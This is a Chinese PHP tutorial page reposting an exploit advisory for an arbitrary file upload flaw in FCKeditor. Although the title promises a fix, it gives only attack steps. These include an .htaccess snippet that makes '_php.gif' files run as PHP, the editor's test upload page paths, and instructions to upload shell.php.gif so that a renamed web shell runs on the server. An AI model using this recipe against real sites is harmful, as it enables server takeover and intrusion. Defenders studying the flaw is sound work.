网站地图    收藏   

主页 > 后端 > 网站安全 >

FCKeditor所有版本任意文件上传缺陷及修复 - 网站

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] In The Name Of GOD[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability[+] script:http://sourceforge.net/projects/fckeditor/[+] Author : pentesters.ir[+] Website : ......

In The Name Of GOD
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author  : pentesters.ir
[+] Website : PenTesters.IR
---------------------------------------------------------
1.创建一个htaccess文件:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
 
2.通过fc上传该htaccess

http://www.2cto.com /FCKeditor/editor/filemanager/upload/test.html
http://www.2cto.com /FCKeditor/editor/filemanager/browser/default/connectors/test.html
----------------------------------------------------------------------------------------------
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically.
5.http://www.2cto.com /anything/shell_php.gif
6.Now shell is available from server.
---------------------------------------------------------
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论